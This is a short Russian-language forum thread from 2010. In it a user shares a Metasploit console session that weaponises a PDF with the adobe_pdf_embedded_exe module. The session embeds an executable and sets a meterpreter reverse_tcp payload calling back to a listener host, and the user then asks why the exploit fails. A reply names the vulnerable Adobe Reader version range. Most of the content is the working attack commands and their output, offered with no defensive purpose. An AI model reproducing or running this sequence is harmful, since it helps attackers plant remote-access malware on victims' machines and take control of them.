Pdf сплойт, работа с Metasploit Console

Discussion in 'Песочница' started by apolon47, 8 May 2010.

  1. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    Прописываю следующее
    msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.0.1
    LHOST => 192.168.0.1
    msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /home/1/1.pdf
    INFILENAME => /home/1/1.pdf
    msf exploit(adobe_pdf_embedded_exe) > set EXENAME /home/1/1.exe
    EXENAME => /home/1/1.exe
    msf exploit(adobe_pdf_embedded_exe) > set FILENAME 1_new.pdf
    FILENAME => 1_new.pdf
    msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /home/1
    OUTPUTPATH => /home/1
    msf exploit(adobe_pdf_embedded_exe) > exploit

    [*] Started reverse handler on port 4444
    [*] Reading in '/home/1/1.pdf'...
    [*] Parsing '/home/1/1.pdf'...
    [*] Parsing Successful.
    [*] Using '/home/1/1.exe' as payload...
    [*] Creating '1_new.pdf' file...
    [*] Generated output file /home/1/1_new.pdf
    [*] Exploit completed, but no session was created.


    Новый pdf файл создает успешно. При запуске выдает предупреждение. нажимаю Open file, но программу не запускает (попросту не видит). Я склоняюсь к тому что уязвимость не пашет под моей версией Adobe Reader'a.
     
  2. StarFire

    StarFire Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    118
    Likes Received:
    13
    Reputations:
    1
    а какая у тебя версия Adobe Reader'a ?уязвимы 8.1.2>9.1.0